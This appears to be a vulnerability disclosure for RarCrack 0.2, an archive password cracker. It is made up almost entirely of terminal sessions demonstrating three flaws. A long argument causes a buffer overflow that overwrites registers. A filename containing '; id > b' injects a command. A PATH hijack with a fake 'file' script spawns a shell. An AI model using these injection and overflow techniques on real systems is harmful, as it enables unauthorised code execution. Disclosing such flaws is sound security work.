RarCrack! is a simple brute force password cracker for archives. RarCrack! has multiple bad practices which could cause security problems e.g. when embedded with other programs.
$ /usr/bin/rarcrack $(python3 -c 'print("A"*500)')
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
*** buffer overflow detected ***: /usr/bin/rarcrack terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bfb)[0x7faa1c861bfb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7faa1c8ea1f7]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7330)[0x7faa1c8e8330]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6692)[0x7faa1c8e7692]
/usr/bin/rarcrack(+0x2477)[0x55565707e477]
/usr/bin/rarcrack(+0x1481)[0x55565707d481]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7faa1c8112e1]
/usr/bin/rarcrack(+0x14fa)[0x55565707d4fa]
...
$ gdb -ex=r --args /usr/bin/rarcrack --type $(python3 -c 'print("A"*400)')
...
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
WARNING: invalid parameter --type AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
ERROR: The specified file () is not exists or
you don't have a right permissions!
Program received signal SIGSEGV, Segmentation fault.
0x000055555555644d in ?? ()
(gdb) i r
rax 0x2b 43
rbx 0x4141414141414141 4702111234474983745
rcx 0x7ffff753d730 140737342854960
rdx 0x7ffff77fd760 140737345738592
rsi 0x55555576ac20 93824994421792
rdi 0x0 0
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe3a8 0x7fffffffe3a8
r8 0x7ffff7fccd00 140737353927936
r9 0x2f 47
r10 0x73 115
r11 0x246 582
r12 0x4141414141414141 4702111234474983745
r13 0x4141414141414141 4702111234474983745
r14 0x4141414141414141 4702111234474983745
r15 0x4141414141414141 4702111234474983745
rip 0x55555555644d 0x55555555644d
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
$ export c='; id > b' && touch "$c" && /usr/bin/rarcrack "$c" && cat b
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
Usage: file [-bcEhikLlNnprsvzZ0] [--apple] [--extension] [--mime-encoding] [--mime-type]
[-e testname] [-F separator] [-f namefile] [-m magicfiles] file ...
file -C [-m magicfiles]
file [--help]
INFO: detected file type:
ERROR: Couldn't detect archive type
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)
$ echo -e '#!/bin/sh\n/bin/sh 1>&2' > file && chmod +x file && PATH=$(pwd) /usr/bin/rarcrack /usr/bin/rarcrack
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
$ /usr/bin/id
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)